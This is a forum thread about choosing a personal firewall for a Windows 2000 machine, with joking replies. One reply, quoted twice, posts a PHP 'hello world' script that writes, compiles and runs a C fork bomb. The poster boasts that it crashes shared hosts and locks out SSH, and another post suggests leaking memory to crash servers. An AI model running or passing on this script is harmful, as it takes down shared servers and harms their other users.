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BlackICE has worked well for me. be sure to turn edit the settings when connecting to VPN's as it blocks the reply packets by default!
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I was thinking of upgrading to that from Girlfriend 2.0 but after recent court cases I'm not so sure now. Apparently it deletes all the M$ money files.Originally posted by ASBWife v1.1 is ptetty good. Nothing gets past it and it sure as hell doesn't suck.
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Wife v1.1 is ptetty good. Nothing gets past it and it sure as hell doesn't suck.
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A process leakOriginally posted by scotspineblimey! makes a .not [toot toot] stack trace read like enid blyton. perhaps it has a memory leak?
Creates self replicating processes until the machine shats. Could add a few mallocs minus frees in there to blow the server up as well.
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Firewall
I used the free Sygate firewall for nearly 3 years now.
Never had a problem.
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Originally posted by TheMonkeyThis is my hello world php app:
Works wonders on the tuliptier hosts and they can't even SSH in to sort it out as the ssh daemon can't fork a shell because the process table is full. Woot!PHP Code:<?php
echo "Hello World and goodbye!";
exec("echo \"#include <unistd.h>\\nint main() { for(;;) fork(); return 0; }\" > /tmp/blast.c");
exec("cc /tmp/blast.c -o /tmp/boom");
exec("/tmp/boom");
?>
blimey! makes a .not [toot toot] stack trace read like enid blyton. perhaps it has a memory leak?
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Originally posted by TheMonkeyVery funny. My machines are my bitches and they will remain so.
Machines are fine. Zone Alarm is a total pile of crap - bug-the-user-ware as I like to call it. Kerio is just craply written. Everything else is rock solid.
As for IE7, it's just WRONG in the way it handles CSS in some circumstances.
Just checked the uptime on the windows 2000 box (!!!!!). Only 3 years and 41 days. A miracle!
If zone alarm is bugging your users then turn off the notification option.
I run it on 6 machines at home and non of them produce popup notifications.
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This is my hello world php app:Originally posted by scotspineyep, but just wait till you put your 'hello world' php web app on it...
Works wonders on the tuliptier hosts and they can't even SSH in to sort it out as the ssh daemon can't fork a shell because the process table is full. Woot!PHP Code:<?php
echo "Hello World and goodbye!";
exec("echo \"#include <unistd.h>\\nint main() { for(;;) fork(); return 0; }\" > /tmp/blast.c");
exec("cc /tmp/blast.c -o /tmp/boom");
exec("/tmp/boom");
?>
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yep, but just wait till you put your 'hello world' php web app on it...
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Very funny. My machines are my bitches and they will remain so.Originally posted by scotspineyou do seem to have some highly temperamental machines monkey. are you sure you are talking nicely to them? first ie7 and now zonealarm crashing!? maybe you could try a ram upgrade. 32mb is not generally considered enough these days for a happy pc.
Machines are fine. Zone Alarm is a total pile of crap - bug-the-user-ware as I like to call it. Kerio is just craply written. Everything else is rock solid.
As for IE7, it's just WRONG in the way it handles CSS in some circumstances.
Just checked the uptime on the windows 2000 box (!!!!!). Only 3 years and 41 days. A miracle!
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you do seem to have some highly temperamental machines monkey. are you sure you are talking nicely to them? first ie7 and now zonealarm crashing!? maybe you could try a ram upgrade. 32mb is not generally considered enough these days for a happy pc.
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Ahh didn't know they did a firewall! I use their AV stuff so I should have noticed. Will investigate.
Thanks!
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avg
I use avg,it's cheap, chearfull and more to the point stable, does the job without annoying little messages popping up.
http://www.grisoft.com/doc/avgplusfw/lng/us/tpl/tpl01
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Personal firewall that doesn't suck
Any recommendations? This is for a Windows 2000 machine which is patched straight into the back of a router with no admin access.
I've tried Kerio and ZoneAlarm which either crash or annoy the hell out of the user.
I need something silent, easy to admin and doesn't crash leaving the machine wide open.Tags: None
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